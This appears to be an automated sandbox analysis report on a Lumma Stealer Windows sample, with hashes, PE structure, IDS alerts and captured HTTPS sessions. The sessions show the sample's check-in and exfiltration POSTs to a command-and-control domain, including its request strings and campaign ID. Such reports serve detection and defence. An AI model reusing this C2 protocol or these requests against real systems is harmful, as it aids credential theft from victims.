7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
IERiUft8Wi.exe | malicious | LummaC | 104.21.11.101
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
zi042476Iv.exe | malicious | LummaC | 104.21.11.101
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
ZvHSpovhDw.exe | malicious | LummaC | 172.67.165.185
8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | 172.67.165.185
ARoqFi68Nr.exe | malicious | LummaC | 172.67.165.185
Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
PH1D3KHmOD.exe | malicious | LummaC | 172.67.165.185
7jKx8dPOEs.exe | malicious | LummaC | 172.67.165.185
IERiUft8Wi.exe | malicious | LummaC | 172.67.165.185
oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.165.185
zi042476Iv.exe | malicious | LummaC | 172.67.165.185
C8FtVPhuxd.exe | malicious | LummaC | 172.67.165.185
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948937301400228
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: cFLK1CiiNK.exe
File size: 1'865'728 bytes
MD5: a95fc73c07c7d57256de64b06e73a6cd
SHA1: b5b823520691853414948ed9b962e3cf886b868c
SHA256: 540319216f35894c8d8252208fb9d8aa9414f9805d7ce0bf3c674c0dfafedb4c
SHA512: 04462857b8574fdc3ef84ff0b7842ee7c64d264c70c2a28c842edaed23f7cc4f15fb0efdfcdea2ec87248be1c1c2f1bc1392c7b49221808b95a3e54cbb1f24a0
SSDEEP: 49152:dB3O3/EYz6z5Mhc1XpL9z9zQiK33c8ez0C/JIg5:Xa//6z5R9p8iKcb0kJT5
TLSH: 5085330ACE963431D45837B00F3BA7D5EBB4B285A471CE7B4E2D926D91E2D1F261C06E
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................I...........@...........................I.....<.....@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x899000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F61291667CAh
orps xmm3, dqword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F61291687C5h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x52000 | 0x26400 | 5979988333de7ea174ad531f5757dc7d | False | 0.9995468239379085 | data | 7.980910308787284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x55000 | 0x2a5000 | 0x200 | 435868c3196be88f7ddd00a3f81a3824 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yrxjmqat | 0x2fa000 | 0x19e000 | 0x19d600 | b39228cd545d446f648b4aeb2daaef83 | False | 0.9950601942848503 | data | 7.954658612611576 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kamsbjdu | 0x498000 | 0x1000 | 0x600 | 9672194dd6cdaaa14adb4f663070ce08 | False | 0.5813802083333334 | data | 5.027106845563143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x499000 | 0x3000 | 0x2200 | 56e0dcac02e979998dc68af7bea90292 | False | 0.06008731617647059 | DOS executable (COM) | 0.7382855847721984 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T08:56:44.521401+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49699 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:45.229985+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49699 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:45.229985+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49699 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:46.514354+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49700 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:47.295254+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49700 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:47.295254+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49700 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:49.148046+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49701 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:51.390512+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49703 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:53.681437+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49709 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:56.621880+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49715 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:57.398383+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49715 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:59.258103+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49723 | 172.67.165.185 | 443 | TCP
2024-12-27T08:57:03.029746+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49736 | 172.67.165.185 | 443 | TCP
                                                                                                                  Dec 27, 2024 08:56:59.262480974 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.262506008 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.262607098 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.262629986 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.262792110 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.262813091 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263077021 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263093948 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263257027 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263274908 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263427019 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263443947 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263456106 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263465881 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263606071 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263624907 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.263645887 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263804913 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.263824940 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.311336994 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.313920975 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.313955069 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.313991070 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.314013958 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.314038992 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.314049006 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:56:59.314060926 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:56:59.314066887 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:01.740326881 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:01.740427971 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:01.740520000 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:57:01.760615110 CET49723443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:57:01.760633945 CET44349723172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:01.772912979 CET49736443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:57:01.772969007 CET44349736172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:01.773077011 CET49736443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:57:01.773581028 CET49736443192.168.2.7172.67.165.185
                                                                                                                  Dec 27, 2024 08:57:01.773601055 CET44349736172.67.165.185192.168.2.7
                                                                                                                  Dec 27, 2024 08:57:03.029746056 CET49736443192.168.2.7172.67.165.185
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:56:43.068430901 CET | 59882 | 53 | 192.168.2.7 | 1.1.1.1
Dec 27, 2024 08:56:43.206702948 CET | 53 | 59882 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 08:56:43.068430901 CET | 192.168.2.7 | 1.1.1.1 | 0xce84 | Standard query (0) | mindhandru.buzz | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 08:56:43.206702948 CET | 1.1.1.1 | 192.168.2.7 | 0xce84 | No error (0) | mindhandru.buzz | - | 172.67.165.185 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:56:43.206702948 CET | 1.1.1.1 | 192.168.2.7 | 0xce84 | No error (0) | mindhandru.buzz | - | 104.21.11.101 | A (IP address) | IN (0x0001) | false

• mindhandru.buzz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 172.67.165.185 | 443 | 3592 | C:\Users\user\Desktop\cFLK1CiiNK.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:56:44 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: mindhandru.buzz
2024-12-27 07:56:44 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-27 07:56:45 UTC | 1126 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:56:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=kg1v9b87niu4blngcojrhm18rs; expires=Tue, 22 Apr 2025 01:43:24 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2a5RQL6LhYV2gosjQUFqSE1SSOM3aAtaGDzhyqf3kXLbJKiVIcvIWwkX%2F1MTVg2W57qeItY61g0eBr9LjFKnPDjc9cvSIWMOhIdhrddYRMW19jOGb5nhZTLrQD%2F%2BDTtFvnY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87c17bfe3542aa-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=29823&min_rtt=1780&rtt_var=17387&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1640449&cwnd=201&unsent_bytes=0&cid=6686b199cbe7ba2c&ts=720&x=0"
2024-12-27 07:56:45 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2024-12-27 07:56:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49700 | 172.67.165.185 | 443 | 3592 | C:\Users\user\Desktop\cFLK1CiiNK.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:56:46 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: mindhandru.buzz
2024-12-27 07:56:46 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-27 07:56:47 UTC | 1128 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:56:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=303dvepgd5dqulc09gdodcmfrj; expires=Tue, 22 Apr 2025 01:43:26 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PmbkCfuZSqwubJPPX9KO7LG6QzK0KbMmxjPfnr%2B%2F79vjc2lbZHDa6bBUCKtp8CdoMntV%2BYVHAJr9NsrCpDXTJBzRy7Ro%2FIuAN%2FGgrDMYdAIIr0YtWCOcTy9M2L3LV%2FtEAo%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87c1888bea42fe-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1569&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=946&delivery_rate=1720683&cwnd=69&unsent_bytes=0&cid=993240005c1f1b7b&ts=787&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.7  49701        172.67.165.185  443               3592  C:\Users\user\Desktop\cFLK1CiiNK.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-27 07:56:49 UTC  273                OUT        (HTTP request)
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=PNPROZ0RYU
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12796
    Host: mindhandru.buzz
2024-12-27 07:56:49 UTC  12796              OUT        (request body, decoded from the raw bytes; dump truncated as in the report)
    --PNPROZ0RYU
    Content-Disposition: form-data; name="hwid"

    E7A4D190B29C4B72BEBA0C6A975F1733
    --PNPROZ0RYU
    Content-Disposition: form-data; name="pid"

    2
    --PNPROZ0RYU
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    --PNPROZ0RYU
    Content-
2024-12-27 07:56:50 UTC  1129               IN         (HTTP response)
    HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:56:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=m2tkl9464b43umpbf2ijaljabo; expires=Tue, 22 Apr 2025 01:43:28 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BftCoN%2BQKUZUcEDtClACVnxfNLYGxBH4K6oUm%2BJg5wT48Jau7kkQLJl7ghNx6XCR15BQsve8Ay%2F6S5XAoRLizQ9dVdxm7laJShfyEXeQV6W1uEI7psPPHn1qfUUzdzY4sL8%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87c1983a7c5e7d-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1631&rtt_var=624&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13727&delivery_rate=1736028&cwnd=227&unsent_bytes=0&cid=e6b5c8bddba31ce6&ts=934&x=0"
2024-12-27 07:56:50 UTC  20                 IN         (response body, chunked; chunk size then payload)
    f
    ok 8.46.123.189
2024-12-27 07:56:50 UTC  5                  IN         (terminating chunk)
    0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.7  49703        172.67.165.185  443               3592  C:\Users\user\Desktop\cFLK1CiiNK.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-27 07:56:51 UTC  278                OUT        (HTTP request)
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=EDFZHD0QP9Z0339
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15058
    Host: mindhandru.buzz
2024-12-27 07:56:51 UTC  15058              OUT        (request body, decoded from the raw bytes; dump truncated as in the report)
    --EDFZHD0QP9Z0339
    Content-Disposition: form-data; name="hwid"

    E7A4D190B29C4B72BEBA0C6A975F1733
    --EDFZHD0QP9Z0339
    Content-Disposition: form-data; name="pid"

    2
    --EDFZHD0QP9Z0339
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    --EDFZH
2024-12-27 07:56:52 UTC  1121               IN         (HTTP response)
    HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:56:52 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=5rghv9m4jpqcusfr0kgboo601s; expires=Tue, 22 Apr 2025 01:43:30 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cJQinjoHBa2Xx6oS5o1dLec06d13Qvb4ADG5aF6sPAikfOlL42eTHx7rlPYbebco1skjU0nhTcJ7ZQLy1GtB3GtxihDhay2gAAIGMyQDknqLx6jKWUmPblkNZHUKZrbRTg%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87c1a63f8178db-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1784&rtt_var=690&sent=13&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15994&delivery_rate=1563169&cwnd=237&unsent_bytes=0&cid=ec91a069a8502af5&ts=810&x=0"
2024-12-27 07:56:52 UTC  20                 IN         (response body, chunked; chunk size then payload)
    f
    ok 8.46.123.189
2024-12-27 07:56:52 UTC  5                  IN         (terminating chunk)
    0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.7  49709        172.67.165.185  443               3592  C:\Users\user\Desktop\cFLK1CiiNK.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-27 07:56:53 UTC  278                OUT        (HTTP request)
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=G4BWS4NU6UPZBKO
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20383
    Host: mindhandru.buzz
2024-12-27 07:56:53 UTC  15331              OUT        (request body, first chunk, decoded from the raw bytes; dump truncated as in the report)
    --G4BWS4NU6UPZBKO
    Content-Disposition: form-data; name="hwid"

    E7A4D190B29C4B72BEBA0C6A975F1733
    --G4BWS4NU6UPZBKO
    Content-Disposition: form-data; name="pid"

    3
    --G4BWS4NU6UPZBKO
    Content-Disposition: form-data; name="lid"

    PsFKDg--pablo
    --G4BWS
2024-12-27 07:56:53 UTC  5052               OUT        (request body, second chunk: binary payload, raw dump not reproduced)
2024-12-27 07:56:54 UTC  1127               IN         (HTTP response)
    HTTP/1.1 200 OK
    Date: Fri, 27 Dec 2024 07:56:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=gkoemnpfn1608ribihtt0gu76e; expires=Tue, 22 Apr 2025 01:43:33 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCmcwqwgplMvbhQzKlsZlhIqM5xIHEIJMEt5M6labQTbT%2FW5tJ1ZY492pIgHPDjtYK1fH6cCtMYtzfIuO9EOifilg1b%2FJcUU7QyOLSWBHQ6XzDM%2B9YVYmcAEpIzX73WQ4OY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f87c1b49f6043e0-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2104&min_rtt=2090&rtt_var=812&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21341&delivery_rate=1324263&cwnd=247&unsent_bytes=0&cid=1271e7c0ad3a06d5&ts=943&x=0"
2024-12-27 07:56:54 UTC  20                 IN         (response body, chunked; chunk size then payload)
    f
    ok 8.46.123.189
2024-12-27 07:56:54 UTC  5                  IN         (terminating chunk)
    0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.7  49715        172.67.165.185  443               3592  C:\Users\user\Desktop\cFLK1CiiNK.exe

Timestamp                Bytes transferred  Direction  Data
